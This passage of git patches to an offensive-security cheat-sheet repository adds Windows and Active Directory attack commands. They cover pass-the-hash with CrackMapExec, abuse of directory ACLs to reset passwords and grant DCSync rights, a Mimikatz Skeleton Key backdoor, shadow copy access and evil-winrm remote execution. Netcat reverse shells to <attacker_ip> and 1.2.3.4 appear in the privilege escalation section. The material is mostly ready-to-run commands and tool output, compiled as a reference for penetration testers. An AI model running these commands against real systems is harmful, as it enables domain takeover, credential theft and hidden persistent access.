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

literal 0
HcmV?d00001


From 5163ef902cd28d20becfac37b4f18360ce3c3690 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 3 May 2020 16:28:17 +0200
Subject: [PATCH 45/85] XSS Google Scholar Payload + Skeleton Key Persistence

---
 .../Active Directory Attack.md                | 125 ++++++++++++------
 .../Windows - Persistence.md                  |  10 ++
 .../Windows - Privilege Escalation.md         |  50 ++++++-
 .../Windows - Using credentials.md            |  18 +++
 XSS Injection/Files/mouseover-xss-ecs.jpeg    | Bin 0 -> 1148 bytes
 XSS Injection/Files/onclick-xss-ecs.jpeg      | Bin 0 -> 1123 bytes
 6 files changed, 165 insertions(+), 38 deletions(-)
 create mode 100644 XSS Injection/Files/mouseover-xss-ecs.jpeg
 create mode 100644 XSS Injection/Files/onclick-xss-ecs.jpeg

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index ce4d6d8..489fcd1 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -46,6 +46,9 @@
       - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
     - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
     - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
+      - [GenericAll](#genericall)
+      - [GenericWrite](#genericwrite)
+      - [WriteDACL](#writedacl)
     - [Trust relationship between domains](#trust-relationship-between-domains)
     - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
     - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
@@ -71,38 +74,50 @@
 * [BloodHound](https://github.com/BloodHoundAD/BloodHound)
 
   ```powershell
-  apt install bloodhound #kali
-  neo4j console
+  # start BloodHound and the database
+  root@payload$ apt install bloodhound #kali
+  root@payload$ neo4j console
+  root@payload$ ./bloodhound
   Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
-  ./bloodhound
-  SharpHound.exe (from resources/Ingestor)
-  SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
-  SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
-  SharpHound.exe -c all -d active.htb -SearchForest
-  SharpHound.exe --EncryptZip --ZipFilename export.zip
-  or 
+  
+  # run the ingestor on the machine using SharpHound.exe
+  # https://github.com/BloodHoundAD/SharpHound3
+  .\SharpHound.exe (from resources/Ingestor)
+  .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
+  .\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
+  .\SharpHound.exe -c all -d active.htb -SearchForest
+  .\SharpHound.exe --EncryptZip --ZipFilename export.zip
+  .\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
+
+  # or run the ingestor on the machine using Powershell
+  # https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors
   Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
-  or 
+  Invoke-BloodHound -CollectionMethod All  -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
+
+  # or remotely via BloodHound Python
+  # https://github.com/fox-it/BloodHound.py
   bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
   ```
 
 * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
 * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
 
-  ```bash
-  apt-get install -y libssl-dev libffi-dev python-dev build-essential
-  git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
-  crackmapexec smb -L
-  crackmapexec smb -M name_module -o VAR=DATA
-  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
-  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
-  crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
-  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
-  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
-  crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
-  crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
-  crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
-  crackmapexec mimikatz --server http --server-port 80
+  ```powershell
+  # use the latest release, CME is now a binary packaged will all its dependencies
+  root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip
+
+  # execute cme (smb, winrm, mssql, ...)
+  root@payload$ cme smb -L
+  root@payload$ cme smb -M name_module -o VAR=DATA
+  root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
+  root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
+  root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
+  root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
+  root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
+  root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
+  root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
+  root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
+  root@payload$ cme mimikatz --server http --server-port 80
   ```
 
 * [Mitm6](https://github.com/fox-it/mitm6.git)
@@ -1026,24 +1041,59 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
 
 ### Abusing Active Directory ACLs/ACEs
 
-* **GenericAll on User** : We can reset user's password without knowing the current password
-* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
-* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain`
-* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group
-* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` 
-* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1`
-* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'`
-    ```powershell
-    # give DCSync right to titi
-    Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
-    ```
-
 Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
 
 ```powershell
 ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
 ```
 
+#### GenericAll
+
+* **GenericAll on User** : We can reset user's password without knowing the current password
+* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
+
+GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it.
+
+```powershell
+# using PowerView
+# Check for interesting permissions on accounts:
+Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
+ 
+# Check if current user has already an SPN setted:
+Get-DomainUser -Identity <UserName> | select serviceprincipalname
+ 
+# Force set the SPN on the account:
+Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
+```
+
+#### GenericWrite
+
+* Reset another user's password
+
+    ```powershell
+    # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1
+    $user = 'DOMAIN\user1'; 
+    $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; 
+    $creds = New-Object System.Management.Automation.PSCredential $user, $pass;
+    $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; 
+    Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds;
+    ```
+
+* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1`
+
+
+#### WriteDACL
+
+To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
+
+```powershell
+# Give DCSync right to the principal identity
+Import-Module .\PowerView.ps1
+$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword)
+Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local 
+```
+
 
 ### Trust relationship between domains
 
@@ -1571,4 +1621,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
 * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
 * [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
-* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
\ No newline at end of file
+* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
+* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 5f0b5ac..bd4ca44 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -17,6 +17,7 @@
     * [Services](#services)
     * [Scheduled Task](#scheduled-task)
     * [RDP Backdoor](#rdp-backdoor)
+    * [Skeleton Key](#skeleton-key)
 * [References](#references)
 
 
@@ -174,6 +175,15 @@ Hit F5 a bunch of times when you are at the RDP login screen.
 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
 ```
 
+### Skeleton Key
+
+```powershell
+# Exploitation Command runned as DA:
+Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>
+
+# Access using the password "mimikatz"
+Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
+```
 
 ## References
 
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index d4b05d6..c29fcbf 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -25,9 +25,11 @@
 * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
 * [EoP - Runas](#eop---runas)
+* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
 * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
 * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
 * [EoP - Impersonation Privileges](#eop---impersonation-privileges)
+  * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
   * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
   * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
   * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
@@ -718,6 +720,21 @@ $computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```
 
+## EoP - Abusing Shadow Copies
+
+If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
+
+```powershell
+# List shadow copies using vssadmin (Needs Admnistrator Access)
+vssadmin list shadows
+  
+# List shadow copies using diskshadow
+diskshadow list shadows all
+  
+# Make a symlink to the shadow copy and access it
+mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
+```
+
 ## EoP - From local administrator to NT SYSTEM
 
 ```powershell
@@ -758,6 +775,37 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel
 |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
 |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. ||
 
+### Restore A Service Account's Privileges
+
+> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
+
+```powershell
+# https://github.com/itm4n/FullPowers
+
+c:\TOOLS>FullPowers
+[+] Started dummy thread with id 9976
+[+] Successfully created scheduled task.
+[+] Got new token! Privilege count: 7
+[+] CreateProcessAsUser() OK
+Microsoft Windows [Version 10.0.19041.84]
+(c) 2019 Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>whoami /priv
+PRIVILEGES INFORMATION
+----------------------
+Privilege Name                Description                               State
+============================= ========================================= =======
+SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
+SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
+SeAuditPrivilege              Generate security audits                  Enabled
+SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
+SeImpersonatePrivilege        Impersonate a client after authentication Enabled
+SeCreateGlobalPrivilege       Create global objects                     Enabled
+SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
+
+c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
+```
+
 
 ### Meterpreter getsystem and alternatives
 
@@ -794,7 +842,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
 ### Juicy Potato (abusing the golden privileges)
 
 Binary available at : https://github.com/ohpe/juicy-potato/releases    
-:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809. 
+:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +. 
 
 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
 
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index cd27039..b1148a3 100644
--- a/Methodology and Resources/Windows - Using credentials.md	
+++ b/Methodology and Resources/Windows - Using credentials.md	
@@ -9,6 +9,8 @@
 * [Metasploit](#metasploit)
     * [Metasploit - SMB](#metasploit-smb)
     * [Metasploit - Psexec](#metasploit-psexec)
+* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
+* [WinRM](#winrm)
 * [Crackmapexec](#crackmapexec)
 * [Winexe](#winexe)
 * [WMI](#wmi)
@@ -99,6 +101,22 @@ python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
 cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
 ```
 
+## Remote Code Execution with PS Credentials
+
+```powershell
+$SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword)
+Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami}
+```
+
+## WinRM
+
+```powershell
+root@payload$ git clone https://github.com/Hackplayers/evil-winrm
+root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
+root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
+```
+
 ## Winexe 
 
 Integrated to Kali
diff --git a/XSS Injection/Files/mouseover-xss-ecs.jpeg b/XSS Injection/Files/mouseover-xss-ecs.jpeg
new file mode 100644
index 0000000000000000000000000000000000000000..0f7053a6a5bb1c95651d450b49be71967d619aab
GIT binary patch
literal 1148
zcmex=<NpH&0WUXCHwH#V1_nkTWcYuZ!I^=TnT3UgnH5N|va+(V^Kh^O0Y5i4CyyY%
zkdPq1prEjrjJU9fl&GMfgrbC$tgO7eys)^Eijtg)jGVk2$Ph-LR(3XaJ`N5(IT1k-
zIg-Ku0}O&33=ND7%#2D5OoEKef{g!<FvtVl$;t=@3{b$x#LNP8B?l)LH&DS=0R|>U
zW@aX!`+*(+s;&jfGq4D<3Mm>ovIz$!vMUve7&T5@$f4}C@t|nX#SbdRNkvVZTw>x9
zl2WQ_>Kd9_CZ=ZQ7M51dF0O9w9-dyoA)#U65s^{JDXD4c8JStdC8cHM6_r)ZEv;?s
z9i3g1CQq3<ZTgIvvlcC0vUJ(<6)RV5+Pr1!w(UE1?mBe%$kAiRPn<k;>GGAU*RJ2V
zdF$b$$4{O<d;a3(tB;>PfBE|D`;VW$K>h;x69yn2L-Us)&|gfzXklRo`HPXM9Eh0(
zSy&Yf*@PSe*%J$em5drWM4Tor+<1^v**NHfXj0KdE-@98hpHbzUIY7#IFB`v<uka)
z5dONwz{AW4j67yR2789Rt|AHwHpOM>j0z%*3jTh%`K86F{$Z{`wuw2ZMI{=BnhK0S
X39u}Juu~8TV00bD!zm2d|K9`v5h@*u

literal 0
HcmV?d00001

diff --git a/XSS Injection/Files/onclick-xss-ecs.jpeg b/XSS Injection/Files/onclick-xss-ecs.jpeg
new file mode 100644
index 0000000000000000000000000000000000000000..ccd2d0f6885981b685373173c11a875c8448d0b5
GIT binary patch
literal 1123
zcmex=<NpH&0WUXCHwH#V1_nkTWcYuZ!I^=TnT3UgnH5N|va+(V^Kh^O0Y5i4CyyY%
zkdPq1prEjrjJU9fl&GMfgrbC$tgO7eys)^Eijtg)jGVk2$Ph-LR(3XaJ`N5(IT1k-
zIg-Ku0}O&33=ND7%#2D5OoEKef{g!<FvtVl$;t=@3{b$x#LNP8B?l)LH&DS=0R|>U
zW@aX!`+*(+s;&jfGq4D<3Mm>ovIz$!vMUve7&T5@$f4}C@t|nX#SbdRNkvVZTw>x9
zl2WQ_>Kd9_CZ=ZQ7M51dF0O9w9-dyoA)#U65s^{JDXD4c8JStdC8cHM6_r)ZEv;?s
z9i3g1CQq3<ZTgIvvlcC0vUJ(<6)RV5+Pr1!w(UE1?mBe%$kAiRPn<k;>GGAU*RJ2V
zdF$b$$4{O<d;a3(tB;>PfBE|D`;VW$K>h;x69yn2L-Us)&|gfzXklRo`HPXM9Eh0(
zSy&Yf*@PSe*%J$em5drWM4Tor+<1^v**NHfXj0KdE-@98hpHbzUIY7#IFB`v<uka)
z5dONwz{AW4j67yR2789Rt|AHwHWiEtB8-d*`FY7XnaSC<i8-l7B^rjBb_yZ^jIN`2
KIE4ZG|C<2r{2Dv}

literal 0
HcmV?d00001


From 1fc8b57c85b3ac917fa64fc77792ddb03478745c Mon Sep 17 00:00:00 2001
From: guanicoe <62290334+guanicoe@users.noreply.github.com>
Date: Sun, 3 May 2020 21:11:01 +0000
Subject: [PATCH 46/85] Update Windows - Privilege Escalation.md

added Get-Process to list processes
---
 Methodology and Resources/Windows - Privilege Escalation.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index c29fcbf..f71519c 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -418,6 +418,7 @@ tasklist /v
 net start
 sc query
 Get-Service
+Get-Process
 Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
 ```
 

From 32b83da30226291b5c6b9e87d48fd46f6d875c22 Mon Sep 17 00:00:00 2001
From: joker2a <nicoaunay@gmail.com>
Date: Mon, 4 May 2020 11:44:24 +0200
Subject: [PATCH 47/85] Update Linux - Privilege Escalation.md

Add new privesc for (Centos/Redhat)
Writable /etc/sysconfig/network-scripts/
---
